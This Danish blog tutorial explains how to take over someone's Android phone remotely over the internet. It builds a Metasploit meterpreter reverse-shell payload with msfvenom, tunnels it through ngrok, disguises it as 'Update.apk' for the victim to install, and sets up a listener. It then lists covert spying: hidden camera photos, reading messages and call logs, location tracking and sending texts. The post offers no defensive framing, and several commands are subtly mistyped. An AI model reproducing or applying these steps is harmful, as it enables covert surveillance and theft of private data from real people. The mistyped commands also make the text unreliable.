Hacking Android Device [Remotely]

Hacking over WAN

Du kan tjekke min Video-tutorial på youtube her:
https://youtu.be/Bbp-AcejtHI

I WAN skal du først have en statisk IP/Hostname og for det andet skal du lave Port Forwarding for at tillade din trafikoverførsel, og vi ved alle, at begge dele er så svært i realtid, da vi har begrænset adgang til porte i et netværk.

Så, hvad vi vil gøre i dette scenarie, vil vi oprette en sikker tunnel ved hjælp af Ngrok.

Ngrok er et tunneling reverse proxy-system, der etablerer tunneler fra et offentligt slutpunkt, dvs. et internet, til en lokalt kørende netværkstjeneste. Dette kan hjælpe os med at oprette en offentlig HTTP/HTTPS-URL for et websted, der kører lokalt på vores maskine. Vi behøver ikke at foretage nogen form for port forwarding, mens vi bruger Ngrok, og vores netværkstjeneste vil i sidste ende eksponere til internettet ved hjælp af TCP-tunneling.

Følg disse trin for at fortsætte:

Step1: Tilmeld dig til Ngrok-konto for at downloade det.

Først skal du tilmelde dig Ngrok-konto, hvorefter du bliver bedt om at hente vinduet til downloading.

Vinduet til tilmelding af Ngrok

Når du har tilmeldt dig, kan du downloade Ngrok til dit Linux-system.

Du skal blot udpakke den downloadede fil.

Stræk 2: Tilslut din konto

Kør denne kommando for at tilføje dit auth-token til standardkonfigurationsfilen ngrok.yml. Dette vil give dig adgang til flere funktioner og længere sessionstider. (Du skal kopiere og indsætte dit eget token her, der leveres på startskærmen i ngrok, efter du har logget ind)

./ngrok authtoken <din token>

Nu er du klar til at bruge dette værktøj. Åbn din terminal flyt dig til den mappe, hvor du har ekstraheret Ngrock-værktøjet, og skriv:

./ngrok tcp

vælger et portnummer, som du vil binde en forbindelse på(her har jeg valgt 5555 som portnummer). Og efter at have trykket på enter, vil en skærm noget som denne blive vist op.

Den forwarding her angiver den TCP tunnel, som ngrok har oprettet. Forbindelsen har bundet sig til localhost på port 5555. Nu skal vi generere en ondsindet nyttelast ved hjælp af msfvenom.

Step3: Generering af nyttelast

Du kan gøre det ved at åbne en ny Terminal i din Kali Linux-maskine og derefter skrive følgende kode.

msfvenom -p android/meterpreter/reverse_tcp LHOST=2.tcp.ngrok.io LPORT=15787 R> .apk

Men husk, at denne gang er det en smule anderledes end det angreb, vi brugte til at udføre i LAN’et. Her skal vi i stedet for IP-adresse indtaste det forwarding-link, der er angivet i ngrok (2.tcp.ngrok.io). Og portnummeret kommer til at være 15787. Husk, at det er vigtigt at indtaste det samme portnummer, som Ngrok har givet i port forwarding.

Bemærk: Hvis det ikke virker at indtaste IP-adressen som 2.tcp.ngrok.io, kan du erstatte den med en IP-adresse, som du kan få ved hjælp af kommandoen “ping”.
Åbn en terminal og skriv ping 2.tcp.ngrok.io og tryk på enter. Du får en IP-adresse, som du skal sætte i stedet for LHOST.

Her har jeg brugt “Update.apk” som filnavn for vores payload. Denne fil skal installeres i vores måls Android-enhed. Men før vi installerer denne fil, skal vi indstille vores lytter. For at gøre det skal du følge trin 4.

Step4: Set-Up a Listener

Åbn din terminal og indlæs Metasploit-konsollen ved at skrive: msfconsole
Når den indlæses(efter et par sekunder), indlæs multi-handler exploit ved at skrive: msfconsole

use exploit/multi/handler

Sæt nu en reverse payload op ved at skrive:

set payload android/meterpreter/reverse_tcp

Sæt din LHOST som 0.0.0.0 og LPORT som 5555
(Portnummeret skal være det samme som det portnummer, der blev brugt til at binde forbindelsen i ngrok)

set LHOST 0.0.0.0.0
set LPORT 5555

Til sidst skal du skrive exploit for at starte lytteren.

Listening mode is on

Step5: Installer Malicious Update.apk-filen i målets enhed

Lad offeret installere appen, og kør den, så snart den bliver installeret. Når offeret rører ved muligheden for at åbne appen, får du adgang til alle funktioner på android-enheden. Der vil dog ikke blive vist noget på enhedens skærm, efter at appen er blevet åbnet.

Post-Exploitation

Typ hjælp for at se de forskellige muligheder, som du kan bruge til at udføre de forskellige opgaver på offerets enhed.
Du kan få adgang til deres kamera og tage et billede uden at give dem besked. Du kan også tjekke deres beskeder, opkaldslister og gemme dem i dit system.
Også kan du se og åbne ethvert program, der er installeret på deres enhed. Du kan endda få brugerens aktuelle placeringskoordinater.
Du kan også sende beskeder til et hvilket som helst kontaktnummer via deres enhed.

Skriv et svar

Din e-mailadresse vil ikke blive publiceret.